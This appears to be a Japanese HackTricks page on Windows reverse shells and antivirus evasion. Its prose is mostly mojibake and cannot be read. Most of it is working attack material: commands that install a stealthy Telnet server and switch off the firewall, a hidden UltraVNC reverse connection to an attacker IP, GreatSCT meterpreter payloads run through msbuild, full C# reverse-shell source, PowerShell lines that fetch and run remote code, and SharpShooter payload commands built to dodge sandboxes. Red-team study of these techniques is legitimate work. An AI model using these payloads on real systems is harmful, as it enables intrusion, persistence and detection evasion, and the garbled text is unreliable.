TelnetãµãŒããŒ
Windows10ãŸã§ããã¹ãŠã®Windowsã«ã¯TelnetãµãŒããŒãä»å±ããŠãããïŒç®¡çè ãšããŠïŒæ¬¡ã®ããã«ã€ã³ã¹ããŒã«ã§ããŸãïŒ
pkgmgr /iu:"TelnetServer" /quiet
ã·ã¹ãã ãèµ·åãããšãã«éå§ããä»ããå®è¡ããŸã:
sc config TlntSVR start= auto obj= localsystem
TelnetããŒãã®å€æŽ (ã¹ãã«ã¹) ãšãã¡ã€ã¢ãŠã©ãŒã«ã®ç¡å¹å:
tlntadmn config port=80
netsh advfirewall set allprofiles state off
UltraVNC
ããŠã³ããŒãã¯ãã¡ããã: http://www.uvnc.com/downloads/ultravnc.html (ã»ããã¢ããã§ã¯ãªããbinããŠã³ããŒããéžæããŠãã ãã)
ãã¹ãäžã§: winvnc.exe ãå®è¡ãããµãŒããŒãèšå®ããŸã:
- ãªãã·ã§ã³ Disable TrayIcon ãæå¹ã«ãã
- VNC Password ã«ãã¹ã¯ãŒããèšå®ãã
- View-Only Password ã«ãã¹ã¯ãŒããèšå®ãã
次ã«ããã€ã㪠winvnc.exe ãš æ°ããäœæããããã¡ã€ã« UltraVNC.ini ã 被害è ã®äžã«ç§»åããŸãã
ãªããŒã¹æ¥ç¶
æ»æè
㯠ãã¹ãå
㧠ãã€ã㪠vncviewer.exe -listen 5900
ãå®è¡ãããªããŒã¹ VNCæ¥ç¶ããã£ããããæºåãããŸãããã®åŸã被害è
å
ã§: winvncããŒã¢ã³ winvnc.exe -run
ãéå§ããwinwnc.exe [-autoreconnect] -connect <attacker_ip>::5900
ãå®è¡ããŸãã
èŠå: ã¹ãã«ã¹ãç¶æããããã«ãããã€ãã®ããšãè¡ã£ãŠã¯ãããŸãã
winvnc
ããã§ã«å®è¡äžã®å Žåã¯éå§ããªãã§ãã ãããããããªããš ãããã¢ãã ã衚瀺ãããŸããtasklist | findstr winvnc
ã§å®è¡äžã確èªããŠãã ãã- åããã£ã¬ã¯ããªã«
UltraVNC.ini
ããªãç¶æ ã§winvnc
ãéå§ããªãã§ãã ãããããããªããš èšå®ãŠã£ã³ã㊠ãéããŸã - ãã«ãã®ããã«
winvnc -h
ãå®è¡ããªãã§ãã ãããããããªããš ãããã¢ãã ã衚瀺ãããŸã
GreatSCT
ããŠã³ããŒãã¯ãã¡ããã: https://github.com/GreatSCT/GreatSCT
git clone https://github.com/GreatSCT/GreatSCT.git
cd GreatSCT/setup/
./setup.sh
cd ..
./GreatSCT.py
Inside GreatSCT:
use 1
list #Listing available payloads
use 9 #rev_tcp.py
set lhost 10.10.14.0
sel lport 4444
generate #payload is the default name
#This will generate a meterpreter xml and a rcc file for msfconsole
ä»ããªã¹ã¿ãŒãéå§ããã«ã¯ msfconsole -r file.rc
ã䜿çšããxmlãã€ããŒããå®è¡ããã«ã¯:
C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml
çŸåšã®ãã£ãã§ã³ããŒã¯ããã»ã¹ãéåžžã«éãçµäºãããŸãã
èªåèªèº«ã®ãªããŒã¹ã·ã§ã«ãã³ã³ãã€ã«ãã
https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15
æåã®C#ãªããŒã¹ã·ã§ã«
次ã®ã³ãã³ãã§ã³ã³ãã€ã«ããŸã:
c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt
䜿çšããã«ã¯ïŒ
back.exe <ATTACKER_IP> <PORT>
// From https://gist.githubusercontent.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc/raw/1b6c32ef6322122a98a1912a794b48788edf6bad/Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
namespace ConnectBack
{
public class Program
{
static StreamWriter streamWriter;
public static void Main(string[] args)
{
using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
{
using(Stream stream = client.GetStream())
{
using(StreamReader rdr = new StreamReader(stream))
{
streamWriter = new StreamWriter(stream);
StringBuilder strInput = new StringBuilder();
Process p = new Process();
p.StartInfo.FileName = "cmd.exe";
p.StartInfo.CreateNoWindow = true;
p.StartInfo.UseShellExecute = false;
p.StartInfo.RedirectStandardOutput = true;
p.StartInfo.RedirectStandardInput = true;
p.StartInfo.RedirectStandardError = true;
p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
p.Start();
p.BeginOutputReadLine();
while(true)
{
strInput.Append(rdr.ReadLine());
//strInput.Append("\n");
p.StandardInput.WriteLine(strInput);
strInput.Remove(0, strInput.Length);
}
}
}
}
}
private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
{
StringBuilder strOutput = new StringBuilder();
if (!String.IsNullOrEmpty(outLine.Data))
{
try
{
strOutput.Append(outLine.Data);
streamWriter.WriteLine(strOutput);
streamWriter.Flush();
}
catch (Exception err) { }
}
}
}
}
C# ã³ã³ãã€ã©ã®äœ¿çš
C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt
REV.txt: https://gist.github.com/BankSecurity/812060a13e57c815abe21ef04857b066
REV.shell: https://gist.github.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639
èªåããŠã³ããŒããšå®è¡:
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
{% embed url="https://gist.github.com/BankSecurity/469ac5f9944ed1b8c39129dc0037bb8f" %}
C# ãªãfuscators ãªã¹ã: https://github.com/NotPrab/.NET-Obfuscator
C++
sudo apt-get install mingw-w64
i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc
- https://github.com/paranoidninja/ScriptDotSh-MalwareDevelopment/blob/master/prometheus.cpp
- https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
- https://www.blackhat.com/docs/us-16/materials/us-16-Mittal-AMSI-How-Windows-10-Plans-To-Stop-Script-Based-Attacks-And-How-Well-It-Does-It.pdf
- https://github.com/l0ss/Grouper2
- http://www.labofapenetrationtester.com/2016/05/practical-use-of-javascript-and-com-for-pentesting.html
- http://niiconsulting.com/checkmate/2018/06/bypassing-detection-for-a-reverse-meterpreter-shell/
Pythonã䜿çšããã€ã³ãžã§ã¯ã¿ã®äŸ:
ãã®ä»ã®ããŒã«
# Veil Framework:
https://github.com/Veil-Framework/Veil
# Shellter
https://www.shellterproject.com/download/
# Sharpshooter
# https://github.com/mdsecactivebreach/SharpShooter
# Javascript Payload Stageless:
SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3
# Stageless HTA Payload:
SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee
# Staged VBS:
SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4
# Donut:
https://github.com/TheWover/donut
# Vulcan
https://github.com/praetorian-code/vulcan
More
{% hint style="success" %}
AWSãããã³ã°ãåŠã³ãç·Žç¿ããïŒHackTricks Training AWS Red Team Expert (ARTE)
GCPãããã³ã°ãåŠã³ãç·Žç¿ããïŒHackTricks Training GCP Red Team Expert (GRTE)
HackTricksããµããŒããã
- ãµãã¹ã¯ãªãã·ã§ã³ãã©ã³ã確èªããŠãã ããïŒ
- **ð¬ Discordã°ã«ãŒããŸãã¯ãã¬ã°ã©ã ã°ã«ãŒãã«åå ããããTwitter ðŠ @hacktricks_liveããã©ããŒããŠãã ããã
- ãããã³ã°ã®ããªãã¯ãå ±æããã«ã¯ãHackTricksãšHackTricks Cloudã®GitHubãªããžããªã«PRãæåºããŠãã ããã